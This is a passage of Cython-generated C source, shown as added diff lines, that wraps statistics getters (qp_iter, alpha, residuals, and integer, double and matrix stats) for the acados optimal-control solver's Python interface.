"acados_template/acados_ocp_solver_pyx.pyx":412 + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] # <<<<<<<<<<<<<< + * + * elif field_ == 'alpha': + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_full_stats, __pyx_tuple__19); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 412, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":411 + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': # <<<<<<<<<<<<<< + * return full_stats[2, :] + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":407 + * return self.__get_stat_matrix(field, stat_n+1, min_size) + * + * elif field_ == 'qp_iter': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":414 + * return full_stats[2, :] + * + * elif field_ == 'alpha': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_alpha, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 414, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":415 + * + * elif field_ == 'alpha': + * full_stats = self.get_stats('statistics') # <<<<<<<<<<<<<< + * if self.nlp_solver_type == 'SQP': + * return full_stats[7, :] + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_n_u_statistics}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v_full_stats = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":416 + * elif field_ == 'alpha': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 416, __pyx_L1_error) + if (likely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":417 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[7, :] # <<<<<<<<<<<<<< + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_full_stats, __pyx_tuple__20); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 417, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":416 + * elif field_ == 'alpha': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":419 + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") # <<<<<<<<<<<<<< + * + * elif field_ == 'residuals': + */ + /*else*/ { + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__21, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 419, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 419, __pyx_L1_error) + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":414 + * return full_stats[2, :] + * + * elif field_ == 'alpha': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":421 + * raise Exception("alpha values are not available for SQP_RTI") + * + * elif field_ == 'residuals': # <<<<<<<<<<<<<< + * return self.get_residuals() + * + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_residuals, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 421, __pyx_L1_error) + if (likely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":422 + * + * elif field_ == 'residuals': + * return self.get_residuals() # <<<<<<<<<<<<<< + * + * else: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_residuals); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 422, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_1, }; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 422, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":421 + * raise Exception("alpha values are not available for SQP_RTI") + * + * elif field_ == 'residuals': # <<<<<<<<<<<<<< + * return self.get_residuals() + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":425 + * + * else: + * raise NotImplementedError("TODO!") # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_NotImplementedError, __pyx_tuple__22, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 425, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 425, __pyx_L1_error) + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_stats", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_double_fields); + __Pyx_XDECREF(__pyx_v_fields); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XDECREF(__pyx_v_sqp_iter); + __Pyx_XDECREF(__pyx_v_stat_m); + __Pyx_XDECREF(__pyx_v_stat_n); + __Pyx_XDECREF(__pyx_v_min_size); + __Pyx_XDECREF(__pyx_v_full_stats); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int = {"_AcadosOcpSolverCython__get_stat_int", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_int (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 428, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_AcadosOcpSolverCython__get_stat_int") < 0)) __PYX_ERR(0, 428, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_field = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_int", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 428, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_24__get_stat_int(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_24__get_stat_int(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field) { + int __pyx_v_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_int", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":430 + * def __get_stat_int(self, field): + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) # <<<<<<<<<<<<<< + * return out + * + */ + __pyx_t_1 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_1) && PyErr_Occurred())) __PYX_ERR(0, 430, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_1, ((void *)(&__pyx_v_out))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":431 + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + * return out # <<<<<<<<<<<<<< + * + * def __get_stat_double(self, field): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyInt_From_int(__pyx_v_out); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double = {"_AcadosOcpSolverCython__get_stat_double", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_double (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 433, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_AcadosOcpSolverCython__get_stat_double") < 0)) __PYX_ERR(0, 433, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_field = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_double", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 433, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_double", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_26__get_stat_double(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_26__get_stat_double(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field) { + PyArrayObject *__pyx_v_out = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyArrayObject *__pyx_t_5 = NULL; + char const *__pyx_t_6; + char *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_double", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":434 + * + * def __get_stat_double(self, field): + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + * return out + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_np); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_zeros); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_2)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_tuple__23}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 434, __pyx_L1_error) + __pyx_t_5 = ((PyArrayObject *)__pyx_t_1); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_5, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 434, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_5 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":435 + * def __get_stat_double(self, field): + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) # <<<<<<<<<<<<<< + * return out + * + */ + __pyx_t_6 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_6) && PyErr_Occurred())) __PYX_ERR(0, 435, __pyx_L1_error) + __pyx_t_7 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out)); if (unlikely(__pyx_t_7 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 435, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_6, ((void *)__pyx_t_7)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":436 + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + * return out # <<<<<<<<<<<<<< + * + * def __get_stat_matrix(self, field, n, m): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_double", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix = {"_AcadosOcpSolverCython__get_stat_matrix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field = 0; + PyObject *__pyx_v_n = 0; + PyObject *__pyx_v_m = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_matrix (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field,&__pyx_n_s_n,&__pyx_n_s_m,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, 